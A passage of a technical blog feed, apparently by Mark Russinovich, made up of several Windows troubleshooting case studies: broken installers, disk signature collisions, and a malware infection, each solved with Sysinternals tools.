Not ready to give up, I captured another trace. Suspecting that setup was tripping on other fragments of the phantom installation, I searched for “security essentials” in the new trace and found another reference before the setup bailed. To avoid performing this step multiple more times, I went to the registry and performed the same search, deleting about two dozen other keys that had “security essentials” somewhere in them.

I held my breath and ran the installer again, but no go:

The error code was different so I had apparently made some progress, but a web search still didn’t yield any clues. I captured yet another trace and began pouring through the operations. The install made it way past the installed application enumeration, generating tens of thousands of more operations. I scanned back from where Wermgr.exe launched, but was quickly overwhelmed. I just couldn’t spot what had made it unhappy, and that was assuming that whatever it was would be visible in the trace. My brother-in-law was growing skeptical, but I told him I wasn’t done. I was motivated by the challenge as much as the fact that I couldn’t let him tell his work buddies that he’d watched me fail.

I decided I needed the guidance of a successful installation’s trace so that I could find where things went astray. When it’s an option, like it was here, side-by-side trace comparison is a powerful troubleshooting technique. I switched to my laptop, launched a Windows 7 virtual machine, and generated a trace of MSE’s successful installation on a clean system. I then copied the log from my mom’s computer and opened both traces in separate windows, one on the top of the screen and one on the bottom.

Scrolling through the traces in tandem, I was able to synchronize them simply by looking at the shapes that the operation paths make in the window and occasionally ensuring that they were indeed in sync by looking closely at a few operations. Though it was laborious, I progressed through the trace, at times losing sync but then gaining it back. One trace being from a clean system and the other with lots of software installed caused relatively minor differences I could discount.

Finally after about 10 minutes, I found an operation that differed in what seemed to be a significant way: an open of the registry key HKCR\Installer\UpgradeCodes\11BB99F8B7FD53D4398442FBBAEF050F returned SUCCESS in the failing trace:

but NAME NOT FOUND in the working one:

Another bit of the broken installation it seemed, but without any reference to MSE, so one that hadn’t shown up in my registry search. I deleted the key, and with some forced confidence told my brother-in-law that I had solved the problem. Then I crossed my fingers and launched the setup again, praying that it would work and I could get back to the holiday festivities that were in full swing downstairs.

Bingo, the setup chugged along for a few seconds and finished by congratulating me on my successful install:

Another seemingly unsolvable problem conquered with Sysinternals, application of a few useful troubleshooting techniques, and some perseverance. My brother-in-law was suitably impressed and had a good story for when he returned to the office after the break, and my mother had a faster PC with free antimalware service.

I followed up with the MSE team and they are working on improving the error codes and making the setup program more robust against these kinds of issues. They also pointed me at some additional resources in case you happen to run into the same kind of problem. First, there’s a Microsoft support tool, MscSupportTool.exe, that extracts the MSE installation log files, which might give some additional information. There’s also a Microsoft ‘fix-it tool’ that addresses some installation corruption problems.

I hope that your holiday troubleshooting met with similar success and wish that your 2012 is free of computer problems!

]]>https://blogs.technet.microsoft.com/markrussinovich/2012/01/03/the-case-of-my-moms-broken-microsoft-security-essentials-installation/feed/23The Case of the Installer Service Errorhttps://blogs.technet.microsoft.com/markrussinovich/2011/11/27/the-case-of-the-installer-service-error/
https://blogs.technet.microsoft.com/markrussinovich/2011/11/27/the-case-of-the-installer-service-error/#commentsMon, 28 Nov 2011 22:00:00 +0000https://blogs.technet.microsoft.com/markrussinovich/2011/11/28/the-case-of-the-installer-service-error/This case unfolds with a network administrator charged with the rollout of the Microsoft Windows Intune client software on their network. Windows Intune is a cloud service that manages systems on a corporate network, keeping their software up to date and enabling administrators to monitor the health of those systems from a browser interface. It requires a client-side agent, but on one particular system the client software failed to install, reporting this error message:

The dialog’s error message translates to “The Windows Installer Service could not be accessed. This can occur if the Windows Installer is not correctly installed. Contact your support personnel for assistance.”

The administrator, having seen one of my Case of the Unexplained presentations where I advised, “when in doubt, run Process Monitor,” downloaded a copy from Sysinternals.com and captured a trace of the failed install. He followed the standard troubleshooting technique of looking backward from the end of the trace for operations that might be the cause, but after about a half hour of analysis he gave up and switched to a different approach. Instead of looking for clues in the trace, he thought he might be able to find clues by comparing the trace of the failing system to another captured on a system where the client installed successfully.

A few minutes later he had a second trace to compare side-by-side. He set a filter to include only events generated by Msiexec.exe, the client setup program, and proceeded through the events in the trace from the problematic system, correlating them with corresponding events on the working one. He eventually got to a point where the two traces diverged. Both traces have references to HKLM\System\CurrentControlSet\Services\BFE, but the failed trace then has registry queries of the ComputerName registry key:

The working system’s trace, on the other hand, continues with operations from a new instance of Msiexec.exe, something he noticed because the process ID of the subsequent Msiexec.exe operations were different from the earlier ones:

It still wasn’t clear from the failed trace what caused the divergence, however. After pondering the situation for a few minutes he was just about to give up when the thought crossed his mind that the answer might lie in the operations that the filter was hiding. He deleted the filter he’d applied that included only events from Msiexec.exe from both traces and resumed comparing traces from the point of divergence.

He immediately saw that the trace from the working system had many events from a Svchost.exe process that weren’t present in the failed trace. Working under the assumption that the Svchost.exe activity was unrelated, he added a filter to exclude it. Now the traces lined up again with events from Services.exe matching in both traces:

The matching operations didn’t go on for very long, however. Only a dozen or so operations later the trace from the failing system had a reference to HKLM\System\CurrentControlSet\Services\Msiserver\ObjectName with a NAME NOT FOUND error:

The trace from the working system had the same operation, but with a SUCCESS result:

Sure enough, right-clicking on the path and selecting “Jump to…” from Process Monitor’s context menu confirmed that not only was the ObjectName value missing from the failing system’s Msiserver key, but the entire key was empty. On the working system it was populated with the registry values required to configure a Windows service:

Somehow the service registration for the MSI service had been corrupted, something the initial error dialog had stated but without guidance for how to fix the problem. And how the service had been corrupted would likely remain forever a mystery, but the important thing now was fixing it. To do so, he simply used Regedit’s export functionality to save the contents of the key from the working system to a .reg file and then imported the file to the corrupted system. After the import, he reran the Microsoft Intune installer and it succeeded without any issues.

With the help of Process Monitor and some diligence, he’d spent about forty-five minutes fixing a problem that would have ended up costing him several hours if he’d had to reimage the system and restore its applications and configuration.

]]>https://blogs.technet.microsoft.com/markrussinovich/2011/11/27/the-case-of-the-installer-service-error/feed/5Fixing Disk Signature Collisionshttps://blogs.technet.microsoft.com/markrussinovich/2011/11/06/fixing-disk-signature-collisions/
https://blogs.technet.microsoft.com/markrussinovich/2011/11/06/fixing-disk-signature-collisions/#commentsTue, 08 Nov 2011 01:00:00 +0000https://blogs.technet.microsoft.com/markrussinovich/2011/11/08/fixing-disk-signature-collisions/Disk cloning has become common as IT professionals virtualize physical servers using tools like Sysinternals Disk2vhd and use a master virtual hard disk image as the base for copies created for virtual machine clones. In most cases, you can operate with cloned disk images unaware that they have duplicate disk signatures. However, on the off chance you attach a cloned disk to a Windows system that has a disk with the same signature, you will suffer the consequences of disk signature collision, which renders unbootable any of the disk’s installations of Windows Vista and newer. Reasons for attaching a disk include offline injection of files, offline malware scanning , and – somewhat ironically – repairing a system that won’t boot. This risk of corruption is the reason that I warn in Disk2vhd’s documentation not to attach a VHD produced by Disk2vhd to the system that generated the VHD using the native VHD support added in Windows 7 and Windows Server 2008 R2.

I’ve gotten emails from people that have run into the disk signature collision problem and see from a Web search that there’s little clear help for fixing it. So in this post, I’ll give you easy repair steps you can follow if you’ve got a system that won’t boot because of a disk signature collision. I’ll also explain where disk signatures are stored, how Windows uses them, and why a collision makes a Windows installation unbootable.

Disk Signatures

A disk signature is four-byte identifier offset 0x1B8 in a disk’s Master Boot Record, which is written to the first sector of a disk. This screenshot of a disk editor shows that the signature of my development system’s disk is 0xE9EB3AA5 (the value is stored in little-endian format, so the bytes are stored in reverse order):

Windows uses disk signatures internally to map objects like volumes to their underlying disks and starting with Windows Vista, Windows uses disk signatures in its Boot Configuration Database (BCD), which is where it stores the information the boot process uses to find boot files and settings. When you look at a BCD’s contents using the built-in Bcdedit utility, you can see the three places that reference the disk signature:

The BCD actually has additional references to the disk signature in alternate boot configurations, like the Windows Recovery Environment, resume from hibernate, and the Windows Memory Diagnostic boot, that don’t show up in the basic Bcdedit output. Fixing a collision requires knowing a little about the BCD structure, which is actually a registry hive file that Windows loads under HKEY_LOCAL_MACHINE\BCD00000:

Here’s the element corresponding to one of the entries seen in the Bcdedit output, where you can see the same disk signature that’s stored in my disk’s MBR:

Disk Signature Collisions

Windows requires the signatures to be unique, so when you attach a disk that has a signature equal to one already attached, Windows keeps the disk in “offline” mode and doesn’t read its partition table or mount its volumes. This screenshot shows how the Windows Disk Management administrative utility presents an offline disk that I caused when I attached the VHD Disk2vhd created for my development system to that system:

If you right-click on the disk, the utility offers an “Online” command that will cause Windows to analyze the disk’s partition table and mount its volumes:

When you chose the Online menu option, Windows will without warning generate a new random disk signature and assign it to the disk by writing it to the MBR. It will then be able to process the MBR and mount the volumes present, but when Windows updates the disk signature, the BCD entries become orphaned, linked with the previous disk signature, not the new one. The boot loader will fail to locate the specified disk and boot files when booting from the disk and give up, reporting the following error:

Restoring a Disk Signature

One way to repair a disk signature corruption is to determine the new disk signature Windows assigned to the disk, load the disk’s BCD hive, and manually edit all the registry values that store the old disk signature. That’s laborious and error-prone, however. In some cases, you can use Bcdedit commands to point the device elements at the new disk signature, but that method doesn’t work on attached VHDs and so is unreliable. Fortunately, there’s an easier way. Instead of updating the BCD, you can give the disk its original disk signature back.

First, you have to determine the original signature, which is where knowing a little about the BCD becomes useful. Attach the disk you want to fix to a running Windows system. It will be online and Windows will assign drive letters to the volumes on the disk, since there’s no disk signature collision. Load the BCD off the disk by launching Regedit, selecting HKEY_LOCAL_MACHINE, and choosing Load Hive from the File menu:

Navigate to the disk’s hidden \Boot directory in the file dialog, which resides in the root directory of one of the disk’s volumes, and select the file named “BCD”. If the disk has multiple volumes, find the Boot directory by just entering x:\boot\bcd, replacing the “x:” with each of the volume’s drive letters in turn. When you’ve found the BCD, pick a name for the key into which it loads, select that key, and search for “Windows Boot Manager”. You’ll find a match under a key named 12000004, like this:

Select the key named 11000001 under the same Elements parent key and note the four-byte disk signature located at offset 0x38 (remember to reverse the order of the bytes).

With the disk signature in hand, open an administrative command prompt window and run Diskpart, the command-line disk management utility. Enter “select disk 2”, replacing “2” with the disk ID that the Disk Management utility shows for the disk. Now you’re ready for the final step, setting the disk signature to its original value with the command “uniqueid disk id=e9eb3aa5”, substituting the ID with the one you saw in the BCD:

When you execute this command, Windows will immediately force the disk and its corresponding volumes offline to avoid a signature collision. Avoid bringing the disk online again or you’ll undo your work. You can now detach the disk and because the disk signature matches the BCD again, Windows installations on the disk will boot successfully. You might find yourself in a situation where you have no choice but to cause a collision and have Windows update a disk signature, but at least now you know how to repair it when you do.

]]>https://blogs.technet.microsoft.com/markrussinovich/2011/11/06/fixing-disk-signature-collisions/feed/4The Case of the Mysterious Rebootshttps://blogs.technet.microsoft.com/markrussinovich/2011/10/02/the-case-of-the-mysterious-reboots/
https://blogs.technet.microsoft.com/markrussinovich/2011/10/02/the-case-of-the-mysterious-reboots/#commentsMon, 03 Oct 2011 01:00:00 +0000https://blogs.technet.microsoft.com/markrussinovich/2011/10/03/the-case-of-the-mysterious-reboots/This case opens when a Sysinternals power user, who also works as a system administrator at a large corporation, had a friend report that their laptop had become unusable. Whenever the friend connected it to a network, their laptop would reboot. The power user, upon getting hold of the laptop, first verified the behavior by connecting it to a wireless network. The system instantly rebooted, first into safe mode, then again back into a normal Windows startup. He tried booting the laptop into safe mode directly, hoping that whatever was causing the problem would be inactive in that mode, but logging on only resulted in an automatic logoff. Returning to a normal boot, he noticed that Microsoft Security Essentials (MSE) was installed and tried to launch it. Double-clicking the icon had no effect, however, and double-clicking its entry in the Programs and Features section of the Control Panel resulted in an error message:

Hovering his mouse over the MSE icon in the start menu gave the explanation: the link was pointing at a bogus location likely created by malware:

Because he couldn’t get to the network, he couldn’t easily repair the corrupted MSE installation. Wondering if the Sysinsternals tools might help, he copied Process Explorer and Autoruns to a USB key, and then copied them from the key to the laptop, which he was now convinced was infected. Launching Process Explorer, he was greeted with the following process tree:

In my Blackhat presentation, Zero Day Malware Cleaning with the Sysinternals Tools, I present a list of characteristics commonly exhibited by malicious processes. They include having no icon, company name, or description, residing in the %Systemroot% or %Userprofile% directories, and being “packed” (encrypted or compressed). While there’s a class of sophisticated malware that doesn’t have any of these attributes, most malware still does. This case is a great example. Process Explorer looks for the signatures of common executable compression tools like UPX, as well as heuristics that include Portable Executable image layouts used by compression engines, and highlights matches in a “packed” highlight color. The default color, fuchsia, is visible on about a dozen processes in the process view. Further, every single one of the highlighted processes lacks a description and company name (though a few have icons).

Many of them also have names that are the same, or similar to, legitimate Windows system executables. The one highlighted below has a name that matches the Windows Svchost.exe executable, but has an icon (borrowed from Adobe Flash) and resides in a nonstandard directory, C:\Windows\Update.1:

Another process with a name not matching that of any Windows executable, but whose name, Svchostdriver.exe, is similar enough to confuse someone not intimately familiar with Windows internals, actually has TCP/IP sockets listening for connections, presumably from a botmaster:

There was no question that the computer was severely infected. Autoruns revealed malware using several different activation points, and explained that the reason even Safe Mode with Command Prompt didn’t work properly was because a bogus executable called Services32.exe (another legitimate-looking name) had registered as the Safe Mode AlternateShell, which is by default Cmd.exe (command prompt):

My recommendation for cleaning malware is to first leverage antimalware utilities if possible. Antimalware might address some or all of an infection, so why do work if you don’t have to? But this system couldn’t connect to the Internet, preventing easily repairing the MSE installation or downloading other antimalware like the Microsoft Malicious Software Removal Tool (MSRT). The power user had seen me use the Process Explorer suspend functionality at a conference to suspend malware processes in order to prevent them from restarting each other when someone trying to clean the system terminates one. Maybe if he suspended all the processes that looked malicious he’d be able to connect to the network without having the system reboot? It was worth a shot.

Right-clicking on each malicious process in turn, he selected Suspend from the context menu to put the process into a state of limbo:

When he was done, the process tree looked like this, with suspended processes colored grey:

Now to see if the trick worked: he connected to the wireless network. Bingo, no reboot. Now connected to the Internet, he proceeded to download MSE, install it, and perform a thorough scan of the system. The engine cranked along, reporting discovered infections as it went. When it finished, it had found four separate malware strains, Trojan:Win32/Teniel, Backdoor:Win32/Bafruz.C, Trojan:Win32/Malex.gen!E, and Trojan:Win32/Sisron:

After rebooting, which was noticeably faster than before, he connected to the network without trouble. As a final check, he launched Process Explorer to see if any suspicious processes remained. To his relief, the process tree looked clean:

Another case solved with the help of the Sysinternals tools! The new Windows Sysinternals Administrator’s Reference, authored by Aaron Margosis and me, covers all the tools and their features in detail, giving you the tools and techniques required to solve problems related to sluggish performance, misleading error messages, and application crashes. And if you’re interested in cyber-security, be sure to get a copy of my technothriller Zero Day.

]]>https://blogs.technet.microsoft.com/markrussinovich/2011/10/02/the-case-of-the-mysterious-reboots/feed/6The Case of the Hung Game Launcherhttps://blogs.technet.microsoft.com/markrussinovich/2011/07/18/the-case-of-the-hung-game-launcher/
https://blogs.technet.microsoft.com/markrussinovich/2011/07/18/the-case-of-the-hung-game-launcher/#commentsTue, 02 Aug 2011 01:00:00 +0000https://blogs.technet.microsoft.com/markrussinovich/2011/08/02/the-case-of-the-hung-game-launcher/I love the cases people send me where the Sysinternals tools have helped them successfully troubleshoot, but nothing is more satisfying than using them to solve my own cases. This case in particular was fun because, well, solving it helped me get back to having fun.

When I have time, I occasionally play PC games to let off steam (pun intended, as you’ll see). One of my favorites over the last few years was the puzzle game, Portal. I enjoyed the first Portal so much that I pre-ordered Portal 2 on Valve’s Steam network when it became available and played through it within a few hours of its release. Since then, I’ve been playing community-developed maps. Last Saturday I started a particularly fun map, a winner from a community map contest, but didn’t have time to finish it in one sitting. The next morning I returned to my PC, double-clicked on the Portal 2 desktop icon, and got the standard Steam launch dialog. The game normally launches in a couple of seconds, but this time the dialog just sat there:

I killed Steam and double-clicked again, but again the dialog hung. I captured a Process Monitor trace and looked at the stacks of Steam’s threads in Process Explorer, but didn’t see any clues. Figuring that perhaps Portal 2’s configuration or installation had somehow been corrupted, I deleted Portal 2, re-downloaded it, and reinstalled it. That didn’t fix the problem, though. With Portal 2 reset to a clean state, that left either Steam or some general Windows issue to blame. The next step was therefore to reinstall Steam.

I first went to the Uninstall or Change a Program page in the Control Panel, but double-clicking on the Steam entry brought up a dialog asking me to confirm uninstalling it and warning that doing so would delete all local content. I didn’t want to risk losing my game settings or have to reinstall all my games, so I aborted the uninstall. Most Microsoft Installer Service (MSI)-based installers have a repair option that reinstalls the application without deleting user data or configuration, so I went to the Steam home page, downloaded and executed the Steam installer. Sure enough, the install wizard offered the repair option:

When I pressed the Next button, though, I was greeted with an obviously misleading error message that reported a network error while trying to read from a local file:

I turned to Process Monitor again and captured a trace of the failed repair operation. The error message referred to a file named SteamInstall[1].msi, so I searched the log file for that string. The first hit was the data value read in a query of a registry value under HKCR\Installer\Products named PackageName:

The next hits, a few operations later, were attempts by the installer to read from the file location printed in the error dialog:

That the installer was reading the file name from an existing registry key and the file’s location was in Internet Explorer’s (IE’s) download cache suggested that it was trying to launch the copy of itself that had performed the initial install. Because I had originally launched the installer via IE directly from the Valve web site, just like I was doing now, the download location was in IE’s download cache, but the file must have aged out and been deleted since then.

The Process Monitor trace revealed that the installer was reading the original location from the registry, so if I pointed the registry at the installer’s new download location, I could trick it into launching itself, rather than looking for the previous copy that was now missing. I scanned the log for the new download location by searching for Steaminstall.msi and found its path, another download cache location:

I then went back to the registry query’s entry, right-clicked on it, and selected “Jump To” from the context menu. That caused Process Monitor to launch Regedit and navigate directly to the registry key, where I updated the LastUsedSource and PackageName values to reflect the new download location:

Next, I dismissed the installer’s error dialog, which I had left open, and pressed the wizard’s Next button to try the repair again. This time, Steam proceeded to reinstall and the wizard concluded with a message of success:

Crossing my fingers, I launched Portal 2. Steams’s ‘Preparing to Launch’ dialog flashed for a second and then Portal 2’s splash screen took over the screen: case closed. Uninstalling and then reinstalling Steam and all the games would have likely lead to the same conclusion, but Process Monitor had surely saved me a lot of time and possibly even my saved game state and configurations. In just a few minutes I was back to solving puzzles of a different kind.